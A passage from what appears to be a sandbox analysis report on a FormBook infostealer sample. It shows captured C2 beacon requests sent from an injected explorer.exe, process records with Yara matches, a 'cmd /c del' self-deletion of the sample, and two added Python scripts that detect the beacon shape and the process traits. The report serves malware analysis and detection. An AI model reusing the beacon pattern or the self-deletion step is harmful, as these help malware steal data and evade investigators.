35 38 33 35 3b 26 23 39 35 3b 26 23 32 31 34 34 38 3b 26 23 32 32 39 30 39 3b 26 23 32 39 36 30 39 3b 26 23 32 31 34 34 38 3b 26 23 32 30 38 36 39 3b 26 23 32 33 33 38 34 3b 26 23 32 33 35 36 37 3b 26 23 33 30 33 34 30 3b 26 23 32 33 35 36 37 3b 26 23 34 30 36 34 34 3b 26 23 32 37 38 33 33 3b 26 23 32 38 32 31 36 3b 26 23 32 35 31 30 33 3b 26 23 39 35 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 39 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 34 35 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 34 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 
23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 35 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 36 36 38 31 3b 26 23 32 35 31 36 33 3b 26 23 32 35 33 35 31 3b 26 23 32 33 36 30 31 3b 26 23 32 31 38 39 38 3b 26 23 33 30 31 34 30 3b 26 23 32 30 31 30 32 3b 26 23 39 35 3b 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 30 33 32 30 3b 26 23 32 36 31 35 39 3b 26 23 31 39 39 38 31 3b 26 23 32 36 31 35 39 3b 26 23 32 37 34 32 34 3b 26 23 39 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 38 34 30 35 3b 26 23 33 35 38 33 35 3b 26 23 39 35 3b 26 23 32 31 34 34 38 3b 26 23 32 32 39 30 39 3b 26 23 32 39 36 30 39 3b 26 23 32 31 34 34 38 3b 26 23 32 30 38 36 39 3b 26 23 32 33 33 38 34 3b 26 23 32 33 35 36 37 3b 26 23 33 30 33 34 30 3b 26 23 32 33 35 36 37 3b 26 23 34 30 36 34 34 3b 26 23 32 37 38 33 33 3b 26 23 32 38 32 31 36 3b 26 23 32 35 31 30 33 3b 26 23 39 35 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 35 35 3b 26 23 39 35 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 34 35 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 34 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34
                                                                                                                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#23567;&#19996;&#35199;&#25165;&#19968;&#26681;&#25163;&#25351;&#23601;&#21898;&#30140;&#20102;&#95;&#23567;&#19996;&#35199;&#20320;&#26159;&#19981;&#26159;&#27424;&#99;&#20813;&#36153;&#38405;&#35835;&#95;&#21448;&#22909;&#29609;&#21448;&#20869;&#23384;&#23567;&#30340;&#23567;&#40644;&#27833;&#28216;&#25103;&#95;&#25104;&#24180;&#22899;&#20154;&#20813;&#36153;&#35270;&#39057;&#25773;&#25918;&#55;&#55;&#55;&#55;&#95;&#26085;&#26412;&#19981;&#21345;&#19968;&#21345;&#20108;&#21345;&#22312;&#32447;&#35266;&#30475;</title><meta name="keywords" content="&#23567;&#19996;&#35199;&#25165;&#19968;&#26681;&#25163;&#25351;&#23601;&#21898;&#30140;&#20102;&#95;&#23567;&#19996;&#35199;&#20320;&#26159;&#19981;&#26159;&#27424;&#99;&#20813;&#36153;&#38405;&#35835;&#95;&#21448;&#22909;&#29609;&#21448;&#20869;&#23384;&#23567;&#30340;&#23567;&#40644;&#27833;&#28216;&#25103;&#95;&#25104;&#24180;&#22899;&#20154;&#20813;&#36153;&#35270;&#39057;&#25773;&#25918;&#55;&#55;&#55;&#55;&#95;&#26085;&#26412;&#19981;&#21345;&#19968;&#21345;&#20108;&#21345;&#22312;&#3244


Session ID: 8 | Source IP: 192.168.2.6 | Source Port: 49768 | Destination IP: 52.79.124.173 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:51.038847923 CEST | 5649 | OUT | GET /dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.mzyxi-rkah-y.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 22, 2021 18:25:51.324237108 CEST | 5649 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Server: awselb/2.0
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:51 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 134
                                                                                                                        Connection: close
                                                                                                                        Location: https://www.mzyxi-rkah-y.net:443/dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.6 | 49771 | 75.2.81.221 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:26:06.599775076 CEST | 5667 | OUT | GET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1
Host: www.thenorthgoldline.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:26:06.760885954 CEST | 5668 | IN | HTTP/1.1 403 Forbidden
Date: Tue, 22 Jun 2021 16:26:06 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Server: nginx
Vary: Accept-Encoding
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
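The sessions above all share one request shape: a GET to a single short path token (/dy8g/) with exactly two query parameters, one of them a long base64-alphabet blob, only a Host and a Connection: close header, a 7-byte all-zero body, and explorer.exe as the sending process. The following is an added example, not code from the Joe Sandbox report, that scores a captured request against those traits so a network-side detection can fire on the shape rather than on the domain, which the 301 to www.mzyxi-rkah-y.net shows is not stable. The sample requests, the trait threshold and the inclusion of rundll32.exe in SYSTEM_HOSTS are assumptions made for the example.

```python
"""Added example, not part of the Joe Sandbox report: score a captured HTTP
request against the beacon shape seen in this report's sessions.

Observed on the page: GET /<short token>/?<k>=<v>&<k>=<long base64-like blob>,
only Host and Connection: close headers, a 7-byte all-zero body, and the request
issued by C:\\Windows\\explorer.exe. Thresholds and the rundll32.exe entry in
SYSTEM_HOSTS are assumptions, not facts from the report.
"""
from __future__ import annotations
import re

# Constructed sample modelled on session 9 above (not a raw capture from the page).
SAMPLE_REQUEST = (
    b"GET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/"
    b"lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1\r\n"
    b"Host: www.thenorthgoldline.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)

# Constructed benign request for comparison.
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # long base64-alphabet value
SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{3,6}/$")      # e.g. /dy8g/
SYSTEM_HOSTS = {"explorer.exe", "rundll32.exe"}        # assumption: never speak raw HTTP


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query params, headers, body.

    The query string is split by hand rather than with urllib.parse so that '+'
    and '/' inside the blob are preserved exactly as sent.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&") if query else []:
        key, _, value = pair.partition("=")
        params[key] = value
    return {"method": method, "path": path, "params": params,
            "headers": headers, "body": body}


def beacon_indicators(req: dict, process: str) -> list[str]:
    """Return the list of FormBook-style traits a parsed request exhibits."""
    hits = []
    if req["method"] == "GET" and SHORT_PATH.match(req["path"]):
        hits.append("single short-token path")
    if len(req["params"]) == 2 and any(B64_BLOB.match(v) for v in req["params"].values()):
        hits.append("two query params, one a long base64-like blob")
    if req["headers"].get("connection") == "close" and set(req["headers"]) <= {"host", "connection"}:
        hits.append("only Host and Connection: close headers")
    if req["body"] == b"\x00" * 7:
        hits.append("7-byte all-zero body on a GET")
    if process.lower().rsplit("\\", 1)[-1] in SYSTEM_HOSTS:
        hits.append(f"issued by {process}")
    return hits


def is_formbook_like(raw: bytes, process: str, threshold: int = 4) -> bool:
    """True when at least `threshold` traits match (the threshold is an assumption)."""
    return len(beacon_indicators(parse_request(raw), process)) >= threshold


if __name__ == "__main__":
    for raw, proc in ((SAMPLE_REQUEST, r"C:\Windows\explorer.exe"),
                      (BENIGN_REQUEST, r"C:\Program Files\Mozilla Firefox\firefox.exe")):
        print(proc, is_formbook_like(raw, proc), beacon_indicators(parse_request(raw), proc))
```

The query string is split by hand on purpose: urllib.parse.parse_qsl would turn the "+" inside the blob into a space and break the base64 check. Requiring several traits at once keeps a lone short path or a lone Connection: close from triggering on ordinary traffic.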


Behavior

System Behavior

General

Start time: 18:24:06
Start date: 22/06/2021
Path: C:\Users\user\Desktop\PQMW0W5h3X.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
Imagebase: 0x400000
File size: 205167 bytes
MD5 hash: 6B26DB585F40E14B00B5ADDA57E595DD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 18:24:07
Start date: 22/06/2021
Path: C:\Users\user\Desktop\PQMW0W5h3X.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
Imagebase: 0x400000
File size: 205167 bytes
MD5 hash: 6B26DB585F40E14B00B5ADDA57E595DD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 18:24:11
Start date: 22/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:24:30
Start date: 22/06/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\rundll32.exe
Imagebase: 0x140000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 18:24:33
Start date: 22/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:24:34
Start date: 22/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
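The six process records above carry the host-side traits worth alerting on: the sample starts a second copy of itself one second later and that copy is where most of the in-memory FormBook matches sit; rundll32.exe is launched with no DLL or export on its command line yet also matches the FormBook rules; and cmd.exe /c del removes the original sample from disk. The following is an added example, not code from the Joe Sandbox report, that runs those checks over process start records shaped like the entries above. The record layout, the rule names, the 5-second respawn window and the yara_regions counts (number of memory regions matched per process) are assumptions made for the example.

```python
"""Added example, not part of the Joe Sandbox report: triage a list of process
start records shaped like the System Behavior entries above and flag the traits
this sample shows (rundll32.exe started with no DLL argument, cmd.exe deleting
the original sample, the sample re-launching itself, and FormBook Yara hits
inside a Windows system binary). Record layout, rule names and the 5-second
respawn window are assumptions made for this example.
"""
from __future__ import annotations
import re

SAMPLE = r"C:\Users\user\Desktop\PQMW0W5h3X.exe"

# Constructed records mirroring the report's six processes; yara_regions is the
# number of memory regions that matched a FormBook rule for that process.
RECORDS = [
    {"start": "18:24:06", "path": SAMPLE, "cmdline": f"'{SAMPLE}'", "yara_regions": 1},
    {"start": "18:24:07", "path": SAMPLE, "cmdline": f"'{SAMPLE}'", "yara_regions": 4},
    {"start": "18:24:11", "path": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE", "yara_regions": 0},
    {"start": "18:24:30", "path": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe", "yara_regions": 3},
    {"start": "18:24:33", "path": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f"/c del '{SAMPLE}'", "yara_regions": 0},
    {"start": "18:24:34", "path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "yara_regions": 0},
]

DEL_RE = re.compile(r"/c\s+del\s+['\"]?(.+?)['\"]?\s*$", re.IGNORECASE)
RESPAWN_WINDOW_S = 5  # assumption: how close two launches of one image must be


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _seconds(hhmmss: str) -> int:
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


def triage(records: list[dict]) -> list[dict]:
    """Walk records in start order and return one finding per matched rule."""
    findings = []
    seen_paths = set()
    last_start = {}

    def flag(rec, rule, detail):
        findings.append({"start": rec["start"], "path": rec["path"],
                         "rule": rule, "detail": detail})

    for rec in records:
        name = _basename(rec["path"])
        cmd = rec["cmdline"].strip()
        argv_only = cmd.strip("'\"").lower()
        key = rec["path"].lower()

        # rundll32.exe normally gets "<dll>,<export>"; a bare launch is a hollowing host.
        if name == "rundll32.exe" and argv_only in (key, name):
            flag(rec, "rundll32_no_args", "rundll32.exe started without a DLL argument")

        # cmd.exe /c del <path> where <path> already ran in this tree: self-deletion.
        m = DEL_RE.search(cmd) if name == "cmd.exe" else None
        if m and m.group(1).lower() in seen_paths:
            flag(rec, "self_delete", f"deletes {m.group(1)}")

        # Same image launched again within a few seconds and carrying Yara hits:
        # the second instance is the one holding the unpacked payload.
        prev = last_start.get(key)
        if prev is not None and _seconds(rec["start"]) - prev <= RESPAWN_WINDOW_S and rec["yara_regions"]:
            flag(rec, "respawned_image_with_yara", f"{rec['yara_regions']} matching region(s)")

        # A Windows system binary should never contain FormBook code.
        if key.startswith("c:\\windows\\") and rec["yara_regions"]:
            flag(rec, "system_binary_with_yara", f"{rec['yara_regions']} matching region(s)")

        seen_paths.add(key)
        last_start[key] = _seconds(rec["start"])
    return findings


if __name__ == "__main__":
    for f in triage(RECORDS):
        print(f"{f['start']} {f['rule']:26} {f['path']}  ({f['detail']})")
```

The self-delete rule only fires when the deleted path belongs to an image that already ran in the same tree, so an ordinary "del" of a temporary file does not match. Explorer.exe is left alone because its record carries no Yara matches, even though the sessions above show it as the process that talked to the C2.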
